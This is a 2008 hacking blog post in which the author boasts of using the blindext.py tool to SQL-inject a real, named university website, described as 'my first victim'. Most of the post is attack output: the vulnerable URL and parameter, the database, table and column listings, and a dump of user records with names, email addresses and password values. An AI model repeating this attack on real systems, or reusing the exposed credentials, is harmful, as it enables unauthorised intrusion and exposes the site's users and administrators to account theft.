viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Thursday, September 18, 2008

[SQLi] http://www.unimedia.ac.id

8:58 PM Posted by viperfx07 No comments
After reading some forums, i try an SQL-injection tool called blindext.py from http://forum.darkc0de.com. Simple tool but it's great. Therefore, i try it in some websites that can be exploited with SQL injection. Unfortunately, md5 is hard to break. Need a lot of time to crack it, so i juz leave it uncracked. Here is my first victim :)

Website: http://www.unimedia.ac.id/
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 10:52:25
[0]: 5.0.51-log:umn@localhost:umn

[-] 10:53:12
[-] Total URL Requests 206
[-] Done




[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 10:12:27
[+] Number of Rows: 2

[0]: test
[1]: umn

[-] 10:12:48
[-] Total URL Requests 80
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "umn"
[+] 10:13:08
[+] Number of Rows: 6

[0]: article
[1]: menu
[2]: myinfo
[3]: mymedia
[4]: myuser
[5]: registrasi_baru

[-] 10:15:04
[-] Total URL Requests 379
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "umn" and Table "myuser"
[+] 10:18:32
[+] Number of Rows: 10

[0]: id
[1]: name
[2]: department
[3]: address
[4]: phone
[5]: email
[6]: mypass
[7]: level
[8]: view
[9]: sdate

[-] 10:20:25
[-] Total URL Requests 467
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "umn" Table "myuser"
[+] Column(s) ['id', 'name', 'email', 'mypass']
[+] 10:22:11
[+] Number of Rows: 2

[0]: 1:Web Admin UMN:webadmin@unimedia.ac.id:dW1uaWN0
[1]: 3:na:admin@min.net:author

[-] 10:24:26
[-] Total URL Requests 542
[-] Done

0 comments:

Post a Comment